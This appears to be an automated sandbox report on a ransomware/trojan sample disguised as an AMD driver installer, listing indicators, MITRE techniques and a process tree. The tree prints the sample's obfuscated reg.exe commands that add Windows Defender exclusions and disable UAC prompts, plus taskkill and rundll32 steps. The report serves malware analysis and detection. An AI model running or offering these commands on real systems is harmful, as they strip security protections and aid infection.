db69b82d53374540f247c88e50d443835c021819fdbac7745b4f13a3e14e785e

Analysis

max time kernel
189s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
29-11-2022 16:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AMD-drivers-2.0.7.exe
Size

265.0MB
MD5

4d3bb85589bad628d92b79b17cf5e87e
SHA1

152d6b37b605255a3f7b71e416af6eed1682818a
SHA256

ca15402e6141c7ae941aeed7ff80933c814bce7ca007fb237b7b61c93f3bb338
SHA512

67b4fc2dcb3aeb1b355d9c34b3e46948c868a27db07cce534dd5fb4b2c376206b10bd21be016755b1e20efd51f9b903b3b11cdcc963df23e5d4692a2f8e6f94c
SSDEEP

393216:GKVaRkwboTiwguCPAGlEt883Zr1KCAKmvumolJ5j:dabbO2/DEesmCAKmv4j5j

Score

10^/10

discovery evasion exploit ransomware trojan

Malware Config

Signatures

Modifies Windows Defender notification settings 3 TTPs 3 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\software\microsoft\windows defender security center\notifications	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\windows defender security center\notifications\disableenhancednotifications = "1"	reg.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioruser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	reg.exe

Windows security bypass 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

reg.exereG.exereg.exereg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\cmd = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\exe = "0"	reG.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\dll = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\scr = "0"	reg.exe
Key created	\REGISTRY\MACHINE\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns	reG.exe
Key created	\REGISTRY\MACHINE\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\sySteM32\driVerS\eTc\hoStS = "0"	reg.exe
Key created	\REGISTRY\MACHINE\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490
Drops file in Drivers directory 1 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts cmd.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 23 IoCs

Processes:

AMD-drivers-2.0.7.tmpAMD-drivers-2.0.7.tmpr.exer.exer.exer.exer.exereg.exer.execonhost.exer.exer.exer.exer.exer.exer.exeobs64.exeobs64.tmpr.exeobs64.exeobs64.tmpobs64.scrobs64.sCr

pid	process
336	AMD-drivers-2.0.7.tmp
1460	AMD-drivers-2.0.7.tmp
1580	r.exe
1464	r.exe
1888	r.exe
1064	r.exe
748	r.exe
1124	reg.exe
1276	r.exe
1624	conhost.exe
844	r.exe
1316	r.exe
820	r.exe
1540	r.exe
2016	r.exe
1112	r.exe
108	obs64.exe
544	obs64.tmp
772	r.exe
1064	obs64.exe
1568	obs64.tmp
940	obs64.scr
1736	obs64.sCr

Possible privilege escalation attempt 5 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

1572 takeown.exe
1432 icacls.exe
892 icacls.exe
1612 icacls.exe
2036 icacls.exe
Deletes itself 1 IoCs

Processes:

cmd.exe

pid process

1772 cmd.exe
Drops startup file 1 IoCs

Processes:

AMD-drivers-2.0.7.tmp

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnk AMD-drivers-2.0.7.tmp

pid	process
1572	takeown.exe
1432	icacls.exe
892	icacls.exe
1612	icacls.exe
2036	icacls.exe

pid	process
1772	cmd.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OBS.lnk	AMD-drivers-2.0.7.tmp

Loads dropped DLL 25 IoCs

Processes:

AMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmpAMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmprundll32.exerundll32.execmd.exeobs64.exeobs64.tmpobs64.exeobs64.tmp

pid	process
1672	AMD-drivers-2.0.7.exe
336	AMD-drivers-2.0.7.tmp
336	AMD-drivers-2.0.7.tmp
948	AMD-drivers-2.0.7.exe
1460	AMD-drivers-2.0.7.tmp
1460	AMD-drivers-2.0.7.tmp
432	rundll32.exe
432	rundll32.exe
432	rundll32.exe
432	rundll32.exe
1756	rundll32.exe
1756	rundll32.exe
1756	rundll32.exe
1756	rundll32.exe
940	cmd.exe
940	cmd.exe
940	cmd.exe
940	cmd.exe
940	cmd.exe
1460	AMD-drivers-2.0.7.tmp
108	obs64.exe
544	obs64.tmp
1064	obs64.exe
1568	obs64.tmp
1568	obs64.tmp

Modifies file permissions 1 TTPs 5 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1612 icacls.exe
2036 icacls.exe
1572 takeown.exe
1432 icacls.exe
892 icacls.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

obs64.scr

pid process

940 obs64.scr
940 obs64.scr
Suspicious use of SetThreadContext 1 IoCs

Processes:

obs64.scr

description pid process target process

PID 940 set thread context of 1736 940 obs64.scr obs64.sCr
Drops file in Windows directory 1 IoCs

Processes:

makecab.exe

description ioc process

File created C:\Windows\Logs\CBS\CbsPersist_20221129171658.cab makecab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2024 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

1992 vssadmin.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1172 taskkill.exe
1248 taskkill.exe
1736 taskkill.exe

pid	process
1612	icacls.exe
2036	icacls.exe
1572	takeown.exe
1432	icacls.exe
892	icacls.exe

pid	process
940	obs64.scr
940	obs64.scr

description	pid	process	target process
PID 940 set thread context of 1736	940	obs64.scr	obs64.sCr

description	ioc	process
File created	C:\Windows\Logs\CBS\CbsPersist_20221129171658.cab	makecab.exe

pid	process
2024	schtasks.exe

pid	process
1992	vssadmin.exe

pid	process
1172	taskkill.exe
1248	taskkill.exe
1736	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

Processes:

r.exer.exer.exer.exer.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1"	r.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

Processes:

AMD-drivers-2.0.7.tmpr.exer.exer.exereg.exer.execonhost.exer.exer.exer.exer.exeobs64.tmpobs64.scr

pid	process
1460	AMD-drivers-2.0.7.tmp
1460	AMD-drivers-2.0.7.tmp
1580	r.exe
1580	r.exe
1888	r.exe
1464	r.exe
1888	r.exe
1464	r.exe
1124	reg.exe
1124	reg.exe
1064	r.exe
1064	r.exe
1624	conhost.exe
1624	conhost.exe
1276	r.exe
1276	r.exe
1316	r.exe
1316	r.exe
1540	r.exe
1540	r.exe
1112	r.exe
1112	r.exe
1568	obs64.tmp
1568	obs64.tmp
940	obs64.scr

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

taskkill.exetakeown.exetaskkill.exevssvc.exer.exer.exer.exereg.exer.execonhost.exer.exer.exer.exer.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeTakeOwnershipPrivilege	1572	takeown.exe
Token: SeDebugPrivilege	1248	taskkill.exe
Token: SeBackupPrivilege	1556	vssvc.exe
Token: SeRestorePrivilege	1556	vssvc.exe
Token: SeAuditPrivilege	1556	vssvc.exe
Token: SeDebugPrivilege	1580	r.exe
Token: SeAssignPrimaryTokenPrivilege	1580	r.exe
Token: SeIncreaseQuotaPrivilege	1580	r.exe
Token: 0	1580	r.exe
Token: SeDebugPrivilege	1464	r.exe
Token: SeAssignPrimaryTokenPrivilege	1464	r.exe
Token: SeIncreaseQuotaPrivilege	1464	r.exe
Token: SeDebugPrivilege	1888	r.exe
Token: SeAssignPrimaryTokenPrivilege	1888	r.exe
Token: SeIncreaseQuotaPrivilege	1888	r.exe
Token: 0	1888	r.exe
Token: SeDebugPrivilege	1124	reg.exe
Token: SeAssignPrimaryTokenPrivilege	1124	reg.exe
Token: SeIncreaseQuotaPrivilege	1124	reg.exe
Token: 0	1124	reg.exe
Token: SeDebugPrivilege	1064	r.exe
Token: SeAssignPrimaryTokenPrivilege	1064	r.exe
Token: SeIncreaseQuotaPrivilege	1064	r.exe
Token: SeDebugPrivilege	1624	conhost.exe
Token: SeAssignPrimaryTokenPrivilege	1624	conhost.exe
Token: SeIncreaseQuotaPrivilege	1624	conhost.exe
Token: 0	1624	conhost.exe
Token: SeDebugPrivilege	1276	r.exe
Token: SeAssignPrimaryTokenPrivilege	1276	r.exe
Token: SeIncreaseQuotaPrivilege	1276	r.exe
Token: SeDebugPrivilege	1316	r.exe
Token: SeAssignPrimaryTokenPrivilege	1316	r.exe
Token: SeIncreaseQuotaPrivilege	1316	r.exe
Token: SeDebugPrivilege	1540	r.exe
Token: SeAssignPrimaryTokenPrivilege	1540	r.exe
Token: SeIncreaseQuotaPrivilege	1540	r.exe
Token: 0	1540	r.exe
Token: SeDebugPrivilege	1112	r.exe
Token: SeAssignPrimaryTokenPrivilege	1112	r.exe
Token: SeIncreaseQuotaPrivilege	1112	r.exe
Token: SeDebugPrivilege	1736	taskkill.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

AMD-drivers-2.0.7.tmpobs64.tmp

pid process

1460 AMD-drivers-2.0.7.tmp
1568 obs64.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

obs64.scr

pid process

940 obs64.scr

pid	process
940	obs64.scr

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

AMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmpcmd.exeAMD-drivers-2.0.7.exeAMD-drivers-2.0.7.tmprundll32.exeWScript.execmd.exe

description	pid	process	target process
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1672 wrote to memory of 336	1672	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 336 wrote to memory of 1580	336	AMD-drivers-2.0.7.tmp	cmd.exe
PID 336 wrote to memory of 1580	336	AMD-drivers-2.0.7.tmp	cmd.exe
PID 336 wrote to memory of 1580	336	AMD-drivers-2.0.7.tmp	cmd.exe
PID 336 wrote to memory of 1580	336	AMD-drivers-2.0.7.tmp	cmd.exe
PID 1580 wrote to memory of 1172	1580	cmd.exe	taskkill.exe
PID 1580 wrote to memory of 1172	1580	cmd.exe	taskkill.exe
PID 1580 wrote to memory of 1172	1580	cmd.exe	taskkill.exe
PID 1580 wrote to memory of 1172	1580	cmd.exe	taskkill.exe
PID 336 wrote to memory of 948	336	AMD-drivers-2.0.7.tmp	AMD-drivers-2.0.7.exe
PID 336 wrote to memory of 948	336	AMD-drivers-2.0.7.tmp	AMD-drivers-2.0.7.exe
PID 336 wrote to memory of 948	336	AMD-drivers-2.0.7.tmp	AMD-drivers-2.0.7.exe
PID 336 wrote to memory of 948	336	AMD-drivers-2.0.7.tmp	AMD-drivers-2.0.7.exe
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 948 wrote to memory of 1460	948	AMD-drivers-2.0.7.exe	AMD-drivers-2.0.7.tmp
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 1460 wrote to memory of 432	1460	AMD-drivers-2.0.7.tmp	rundll32.exe
PID 432 wrote to memory of 1756	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 1756	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 1756	432	rundll32.exe	rundll32.exe
PID 432 wrote to memory of 1756	432	rundll32.exe	rundll32.exe
PID 1980 wrote to memory of 1988	1980	WScript.exe	cmd.exe
PID 1980 wrote to memory of 1988	1980	WScript.exe	cmd.exe
PID 1980 wrote to memory of 1988	1980	WScript.exe	cmd.exe
PID 1988 wrote to memory of 2024	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 2024	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 2024	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 384	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 384	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 384	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1076	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1076	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1076	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1992	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1992	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1992	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 2032	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 2032	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 2032	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1656	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1656	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1656	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1552	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1552	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1552	1988	cmd.exe	reg.exe
PID 1988 wrote to memory of 1572	1988	cmd.exe	takeown.exe
PID 1988 wrote to memory of 1572	1988	cmd.exe	takeown.exe
PID 1988 wrote to memory of 1572	1988	cmd.exe	takeown.exe

C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe
"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1672

C:\Users\Admin\AppData\Local\Temp\is-MF02J.tmp\AMD-drivers-2.0.7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MF02J.tmp\AMD-drivers-2.0.7.tmp" /SL5="$60126,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:336

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /f /im obs64.scr
3⤵
- Suspicious use of WriteProcessMemory
PID:1580

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im obs64.scr
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1172

C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe
"C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:948

C:\Users\Admin\AppData\Local\Temp\is-JSB3S.tmp\AMD-drivers-2.0.7.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JSB3S.tmp\AMD-drivers-2.0.7.tmp" /SL5="$70126,13524617,160256,C:\Users\Admin\AppData\Local\Temp\AMD-drivers-2.0.7.exe" /verysilent /sp-
4⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:432

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32" C:\tmp\obs32.dll, Uaby
6⤵
- Loads dropped DLL
PID:1756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\.cmd""
5⤵
- Loads dropped DLL
PID:940

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
r.eXe /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1464

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /TI/ /SW:0 reg.exe add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:748

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "hklm\sOFtWAre\MicrosOFt\WIndOwS defeNder\exCluSIoNS\eXteNSIoNs" /v dll /T reg_dWord /d 0 /f
9⤵
- Windows security bypass
PID:1328

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
r.eXe /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /TI/ /sW:0 reg.exe Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:844

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" Add "hKLM\SoftwAre\MICroSoFT\wINdowS deFender\exCLusioNs\extensIOnS" /v scr /t reg_dwOrd /d 0 /F
9⤵
- Windows security bypass
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
r.eXe /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
6⤵
PID:1124

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /TI/ /Sw:0 reg.exe Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:820

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" Add "hKlm\SOFTwAre\microSofT\WindoWS deFeNder\eXcLUSIonS\eXTeNSionS" /V cmd /t reG_dwOrd /d 0 /F
9⤵
- Windows security bypass
PID:1980

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
r.exe /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
6⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2016

C:\Windows\system32\reG.exe
"C:\Windows\system32\reG.exe" Add "hKlm\Software\MicrOSOFT\WiNdows deFeNder\exclUSiOnS\eXteNSIOns" /V exe /t reg_dWord /d 0 /f
9⤵
- Windows security bypass
PID:1568

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
r.eXe /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1112

C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M6JS.tmp\temp\r.exe" /TI/ /sw:0 reg.exe add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:772

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "hklm\sOFTWAre\MiCroSoFT\wINdows deFeNder\eXClusIoNS\pathS" /V "C:\Windows\sySteM32\driVerS\eTc\hoStS" /t "reG_dwOrd" /d "0" /F
9⤵
- Windows security bypass
PID:1684

C:\tmp\obs64.exe
"C:\tmp\obs64.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:108

C:\Users\Admin\AppData\Local\Temp\is-C5B3E.tmp\obs64.tmp
